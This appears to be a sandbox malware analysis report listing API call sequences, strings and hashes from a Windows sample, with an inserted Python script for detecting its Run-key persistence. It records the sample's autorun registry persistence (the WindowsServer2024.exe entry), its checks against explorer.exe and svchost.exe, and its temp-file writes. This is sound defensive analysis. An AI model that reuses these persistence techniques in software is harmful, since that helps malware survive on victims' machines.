• Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: <$GET
                                                                            • API String ID: 0-427699995
                                                                            • Opcode ID: b4abaf26325ecbffe0a12b209d60a04f808773f653794d1b4064e6e9a026222b
                                                                            • Instruction ID: 6b7f260050ffeb11278019448c8991ddfdc682d517d804b4e7bbd44298630da8
                                                                            • Opcode Fuzzy Hash: b4abaf26325ecbffe0a12b209d60a04f808773f653794d1b4064e6e9a026222b
                                                                            • Instruction Fuzzy Hash: 93021AB0900318DFDB24DFA4DD49BEDB7B5BB48700F104699E609AB380D7B8AA84CF55
                                                                            Strings
                                                                            Memory Dump Source
• Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: <$GET
                                                                            • API String ID: 0-427699995
                                                                            • Opcode ID: 4f552d57753fd1b4d955e907243bce8157ea4a57aa72d086ba39ce8ef5116833
                                                                            • Instruction ID: 1dc88dfb50a8ba0c2d0c5449dd1f8ffee7aa185227034f23a4976ddfd9f6995a
                                                                            • Opcode Fuzzy Hash: 4f552d57753fd1b4d955e907243bce8157ea4a57aa72d086ba39ce8ef5116833
                                                                            • Instruction Fuzzy Hash: EDF100B0A10218DFDB54DFA4DD49BADBBB5FF48704F108559E609AB380DB789984CF50
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007CBA41
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,?), ref: 007CBA5F
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CBA74
                                                                            • __snwprintf.LIBCMT ref: 007CBA9E
                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007CBAC0
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007CBAEF
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBB00
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007CBB0A
                                                                            • OpenEventW.KERNEL32(00100002,00000000,{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}), ref: 007CBB1C
                                                                            • SetEvent.KERNEL32(00000000), ref: 007CBB2F
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007CBB39
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007CBB4B
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBB55
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007CBB5F
                                                                            Strings
                                                                            Memory Dump Source
• Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Free$CloseHandleLocal$EventTask$AllocCreateFileFolderKnownObjectOpenPathSingleWait__snwprintf
                                                                            • String ID: %s\%s$UNLOAD.TXT${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}
                                                                            • API String ID: 1432346771-2750632160
                                                                            • Opcode ID: 3a464ffac06642564380e2b8629775f7c72ad67f18cef3670f88c0e80c5ecec6
                                                                            • Instruction ID: 375a28d0483bd1ca499e7a88a7549f4c965a35b50c99d639df2066aab661b8d2
                                                                            • Opcode Fuzzy Hash: 3a464ffac06642564380e2b8629775f7c72ad67f18cef3670f88c0e80c5ecec6
                                                                            • Instruction Fuzzy Hash: 89310DB5A40304EBDB249FA4DC4EFADBB75FB88711F108A5CF621A62D4D7789A40CB50
                                                                            APIs
                                                                              • Part of subcall function 007CFE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 007CFE74
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(?), ref: 007CFE86
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00831110), ref: 007CFE99
                                                                              • Part of subcall function 007CFE20: LocalAlloc.KERNEL32(00000040,?), ref: 007CFEB2
                                                                              • Part of subcall function 007CFE20: __snwprintf.LIBCMT ref: 007CFEDA
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00000000), ref: 007CFEE6
                                                                              • Part of subcall function 007CFE20: CoTaskMemFree.COMBASE(?), ref: 007CFEF5
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D258B
                                                                            • wnsprintfW.SHLWAPI ref: 007D25BA
                                                                            • RegOpenKeyW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 007D25DD
                                                                            • RegSetValueExW.ADVAPI32(?,00836FC8,00000000,00000001,?,?), ref: 007D2600
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,007D6AED), ref: 007D260A
                                                                            • RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 007D2627
                                                                            • RegSetValueExW.ADVAPI32(?,{AB1F3E47-AEF1-400E-A108-233A046C3A34},00000000,00000001,?,?), ref: 007D264A
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,007D6AED), ref: 007D2654
                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,007D6AED), ref: 007D265E
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2668
                                                                            Strings
                                                                            • j}, xrefs: 007D2566, 007D2569
                                                                            • %s%s %s, xrefs: 007D25AC
                                                                            • {AB1F3E47-AEF1-400E-A108-233A046C3A34}, xrefs: 007D2641
                                                                            • {741330C7-73F4-49B6-9258-6679317DED46}, xrefs: 007D259E
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 007D25D3
                                                                            • WindowsServer2024.exe, xrefs: 007D25A3
                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 007D261D
                                                                            Memory Dump Source
• Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Freelstrlen$AllocCloseOpenValue$FolderKnownPathTask__snwprintfwnsprintf
                                                                            • String ID: %s%s %s$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$WindowsServer2024.exe${741330C7-73F4-49B6-9258-6679317DED46}${AB1F3E47-AEF1-400E-A108-233A046C3A34}$j}
                                                                            • API String ID: 3858463887-980750824
                                                                            • Opcode ID: f5fea622eadbd380a22912794c85d39f138f85225c44b84d48d1785fb48b4da4
                                                                            • Instruction ID: 5489a909f4a7179cc04172ab98dd452e081887d93fae27c0edb2dce850b02c47
                                                                            • Opcode Fuzzy Hash: f5fea622eadbd380a22912794c85d39f138f85225c44b84d48d1785fb48b4da4
                                                                            • Instruction Fuzzy Hash: 5C31A075A00309FFDB14DBA0DC89FBE7779FB88B05F004858F615A6291D6B9A942CB60
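The API sequence above (RegOpenKeyW on the HKCU and HKLM Run keys, RegSetValueExW with type 00000001, i.e. REG_SZ, the format string "%s%s %s", the strings WindowsServer2024.exe and {741330C7-73F4-49B6-9258-6679317DED46}, and the HKLM value name {AB1F3E47-AEF1-400E-A108-233A046C3A34}) is the sample's autorun persistence. The following triage script is an added example written for this page; it is not part of the Joe Sandbox output and not code from the sample. Its assumptions: the three format arguments are a folder path, the file name WindowsServer2024.exe and the GUID argument, so the stored command line reads "<folder>WindowsServer2024.exe {741330C7-...}"; the HKCU value name is taken from a data pointer (00836FC8) whose string the report does not list, so only the HKLM name is matched exactly; and a bare GUID as a Run value name is treated as a heuristic, lower-confidence signal. The sample data embedded in the block is constructed, not taken from the report. When run on Windows the script reads the live Run keys instead (both registry views, since a 32-bit image writing HKLM\SOFTWARE is redirected to Wow6432Node on 64-bit hosts).

```python
"""Run-key persistence triage for the indicators in this report.

Added example, not part of the Joe Sandbox output or of the sample.
Flags Run-key values matching the pattern written at 007D258B..007D2668.
"""
import re
import sys
from dataclasses import dataclass

RUN_SUBKEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Indicators taken verbatim from the strings of the persistence function.
IOC_BINARY = "WindowsServer2024.exe"
IOC_HKLM_VALUE_NAME = "{AB1F3E47-AEF1-400E-A108-233A046C3A34}"
IOC_ARGUMENT = "{741330C7-73F4-49B6-9258-6679317DED46}"

# Heuristic (assumption, not from the report): a bare GUID as a Run value
# name is rare for legitimate software and worth a look on its own.
GUID_RE = re.compile(
    r"^\{[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\}$", re.I)


@dataclass(frozen=True)
class RunEntry:
    hive: str   # "HKCU" or "HKLM"
    name: str   # value name
    data: str   # value data (REG_SZ command line)


def classify(entry: RunEntry) -> list:
    """Return the reasons an entry is suspicious (empty list = clean)."""
    reasons = []
    data = entry.data.lower()
    if IOC_BINARY.lower() in data:
        reasons.append("data references " + IOC_BINARY)
    if IOC_ARGUMENT.lower() in data:
        reasons.append("command line carries the argument " + IOC_ARGUMENT)
    if entry.name.upper() == IOC_HKLM_VALUE_NAME:
        reasons.append("value name equals the HKLM IOC GUID")
    elif GUID_RE.match(entry.name):
        reasons.append("value name is a bare GUID (heuristic)")
    return reasons


def severity(reasons: list) -> str:
    """'high' for a hard IOC match, 'low' for heuristic-only, 'none' if clean."""
    if not reasons:
        return "none"
    if all("heuristic" in r for r in reasons):
        return "low"
    return "high"


def triage(entries) -> list:
    """Pair every suspicious entry with its reasons, hard IOC hits first."""
    hits = [(e, classify(e)) for e in entries]
    hits = [(e, r) for e, r in hits if r]
    hits.sort(key=lambda h: severity(h[1]) != "high")
    return hits


def collect_live_entries() -> list:
    """Read both Run keys on a live Windows host; returns [] elsewhere.

    Both registry views are read because a 32-bit image writing
    HKLM\\SOFTWARE on 64-bit Windows lands under Wow6432Node.
    """
    if sys.platform != "win32":
        return []
    import winreg
    views = (winreg.KEY_WOW64_64KEY, winreg.KEY_WOW64_32KEY)
    hives = (("HKCU", winreg.HKEY_CURRENT_USER),
             ("HKLM", winreg.HKEY_LOCAL_MACHINE))
    found = []
    for hive_name, hive in hives:
        for view in views:
            try:
                key = winreg.OpenKey(hive, RUN_SUBKEY, 0, winreg.KEY_READ | view)
            except OSError:
                continue
            with key:
                index = 0
                while True:
                    try:
                        name, data, _kind = winreg.EnumValue(key, index)
                    except OSError:
                        break
                    found.append(RunEntry(hive_name, name, str(data)))
                    index += 1
    return list(dict.fromkeys(found))   # HKCU is not redirected; drop duplicates


# Constructed sample data (not from the report), imitating what the live
# scan would return on an infected host next to ordinary autoruns.
SAMPLE_ENTRIES = [
    RunEntry("HKLM", IOC_HKLM_VALUE_NAME,
             r"C:\Users\victim\AppData\Roaming\WindowsServer2024.exe " + IOC_ARGUMENT),
    RunEntry("HKCU", "OneDrive",
             r"C:\Users\victim\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
    RunEntry("HKCU", "{12345678-1234-1234-1234-123456789ABC}",
             r"C:\ProgramData\svc\updater.exe"),
    RunEntry("HKLM", "SecurityHealth",
             r"C:\Windows\system32\SecurityHealthSystray.exe"),
]

if __name__ == "__main__":
    entries = collect_live_entries() or SAMPLE_ENTRIES
    for entry, reasons in triage(entries):
        print(f"[{severity(reasons)}] {entry.hive}\\...\\Run\\{entry.name} = {entry.data}")
        for reason in reasons:
            print("    -", reason)
```

The hard indicators are what a responder should pivot on; the GUID-name heuristic is there because the HKCU value name is not recoverable from the listed strings, and a second host may carry a different build with different GUIDs. Verify a hit by checking that the referenced WindowsServer2024.exe exists on disk and by looking for the matching running process before cleaning the value.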
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007D271C
                                                                            • _memmove.LIBCMT ref: 007D273B
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D2788
                                                                            • GetTempPathW.KERNEL32(00007FFF,00000000), ref: 007D27A4
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D27B9
                                                                            • __snwprintf.LIBCMT ref: 007D27E2
                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000002,00000000,00000000), ref: 007D27FD
                                                                            • WriteFile.KERNEL32(000000FF,00000000,00000000,?,00000000), ref: 007D281E
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007D2830
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D283A
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007D2849
                                                                            • DeleteFileW.KERNEL32(00000000), ref: 007D2853
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D285D
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2867
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2871
                                                                            Strings
                                                                            Memory Dump Source
• Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$AllocFile$CloseHandle$CreateDeletePathTempWrite__snwprintf_memmove
                                                                            • String ID: %s%s
                                                                            • API String ID: 2323091063-3252725368
                                                                            • Opcode ID: 366da5ce2ff743708e052b3b7d56f403aadcccf5afd8c902e781c8181d731202
                                                                            • Instruction ID: bbbcf31b8958c6f5ddbaf96a082310a966427baf7ed85d5cac4419ea3e06e7e7
                                                                            • Opcode Fuzzy Hash: 366da5ce2ff743708e052b3b7d56f403aadcccf5afd8c902e781c8181d731202
                                                                            • Instruction Fuzzy Hash: D7412B75A00209EBDB14DFA4DC89FBEBBB5BF88700F104959F615A7391CB789A42CB50
                                                                            APIs
                                                                              • Part of subcall function 007D0010: SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,007D6B10,00831178,007D6B10), ref: 007D0023
                                                                              • Part of subcall function 007D0010: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D0034
                                                                              • Part of subcall function 007D0010: wnsprintfW.SHLWAPI ref: 007D005F
                                                                              • Part of subcall function 007D0010: lstrlenW.KERNEL32(?), ref: 007D0070
                                                                              • Part of subcall function 007D0010: CoTaskMemFree.COMBASE(?), ref: 007D007F
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B,007D6B10,00000000), ref: 007C81EB
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B), ref: 007C8205
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8235
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8251
                                                                              • Part of subcall function 007C81C0: LocalFree.KERNEL32(00000000), ref: 007C8A43
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8AE0
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8AF0
                                                                            • LocalAlloc.KERNEL32(00000040,00030010), ref: 007C8B3B
                                                                            • LocalAlloc.KERNEL32(00000040,00008AD0), ref: 007C8B55
                                                                            • _memmove.LIBCMT ref: 007C8B76
                                                                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 007C8B86
                                                                            • lstrcpyW.KERNEL32(-00010000,00000000), ref: 007C8B99
                                                                            • lstrcpyW.KERNEL32(-00020000,00000000), ref: 007C8BAD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8C32
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8C3C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8C46
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8C57
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8C61
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007C8C98
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8CA2
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8CAC
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C8CB6
                                                                            Memory Dump Source
• Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$lstrcpywnsprintf$FolderKnownPathTaskVirtual_memmovelstrlen
                                                                            • String ID:
                                                                            • API String ID: 586337011-0
                                                                            • Opcode ID: 79e1d975350c5547aa3f96e9111398105525d0d54ac0c7192cdad8f633e84996
                                                                            • Instruction ID: 765c419dbcf18d56132978180fe6bbf0c16ac1b178812634b6ab075516b248f4
                                                                            • Opcode Fuzzy Hash: 79e1d975350c5547aa3f96e9111398105525d0d54ac0c7192cdad8f633e84996
                                                                            • Instruction Fuzzy Hash: 947109B5D00208DBDB54DFA4D889FEEBBB5BF88301F14896DE605B7250DB789980CB61
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007C2314
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 007C2328
                                                                            • _memset.LIBCMT ref: 007C234B
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007C239E
                                                                            • __snwprintf.LIBCMT ref: 007C23D1
                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000044,00000000), ref: 007C2401
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C2415
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C2422
                                                                            • CloseHandle.KERNEL32(?), ref: 007C242F
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C243C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C2449
                                                                              • Part of subcall function 007D79F0: lstrlenW.KERNEL32(?,?,?,?,?,?,?,007D68E6,007F47E8), ref: 007D7A19
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C2467
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C247D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$CloseHandle_memset$AllocCreateDirectoryObjectProcessSingleSystemWait__snwprintflstrlen
                                                                            • String ID: D
                                                                            • API String ID: 1415010105-2746444292
                                                                            • Opcode ID: 1a3a604bd57834d6b94b21d3da7a611048868d1b6fece3b23c41d72d28100d87
                                                                            • Instruction ID: 3a99d916f5b90d8e7f26964c1d2cc42d85b41e88bf1cd6b66287e762e4ac2c85
                                                                            • Opcode Fuzzy Hash: 1a3a604bd57834d6b94b21d3da7a611048868d1b6fece3b23c41d72d28100d87
                                                                            • Instruction Fuzzy Hash: BE5139B1A012289FEB24DF54DD49FDABB78BB88304F0045DDE209A6281DBB85F84CF55
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007DBC7D), ref: 007CBB8D
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CBBA7
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CBBC1
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 007CBBDF
                                                                            • GetWindowsDirectoryW.KERNEL32(00000000,00007FFF), ref: 007CBBF2
                                                                            • __snwprintf.LIBCMT ref: 007CBC0E
                                                                            • lstrcmpiW.KERNEL32(00000000,00000000), ref: 007CBC1E
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBC2C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBC36
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBC40
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBC51
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBC5B
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBC65
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameWindows__snwprintflstrcmpi
                                                                            • String ID: %s\explorer.exe
                                                                            • API String ID: 150365659-2893622748
                                                                            • Opcode ID: 1bc2730156231c136b7fb96f086a86bce623a63ff0a065b1a52db0f5a3755066
                                                                            • Instruction ID: 3a74ed644ddc0e9c05c56b2498eb85bccb282c30296a167ab67ef992d1362bc9
                                                                            • Opcode Fuzzy Hash: 1bc2730156231c136b7fb96f086a86bce623a63ff0a065b1a52db0f5a3755066
                                                                            • Instruction Fuzzy Hash: 7D210175A00209FBDB14ABA4DD4AF6D7B75AF88701F104968F605A6290DF789A40DB20
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007DBCBF), ref: 007CBC8D
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CBCA7
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CBCC1
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 007CBCDF
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 007CBCF2
                                                                            • __snwprintf.LIBCMT ref: 007CBD0E
                                                                            • lstrcmpiW.KERNEL32(00000000,00000000), ref: 007CBD1E
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBD2C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBD36
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBD40
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBD51
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBD5B
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBD65
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem__snwprintflstrcmpi
                                                                            • String ID: %s\svchost.exe
                                                                            • API String ID: 4247545968-1955667316
                                                                            • Opcode ID: 699ed8014c4f767dcf33a654050b7929c6d08a953e07fc12c3da54ac01208e9d
                                                                            • Instruction ID: 2eb0b15fd7ec64151d5c5a103c428b45572cf29b263282069155ef414569a324
                                                                            • Opcode Fuzzy Hash: 699ed8014c4f767dcf33a654050b7929c6d08a953e07fc12c3da54ac01208e9d
                                                                            • Instruction Fuzzy Hash: 2D210175B40209FBDB149FE4DC4AF6D7B75AF88701F104968F606AA290DB789A40CB10
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007DBD01), ref: 007CBD8D
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CBDA7
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CBDC1
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 007CBDDF
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 007CBDF2
                                                                            • __snwprintf.LIBCMT ref: 007CBE0E
                                                                            • lstrcmpiW.KERNEL32(00000000,00000000), ref: 007CBE1E
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBE2C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBE36
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBE40
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBE51
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBE5B
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CBE65
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem__snwprintflstrcmpi
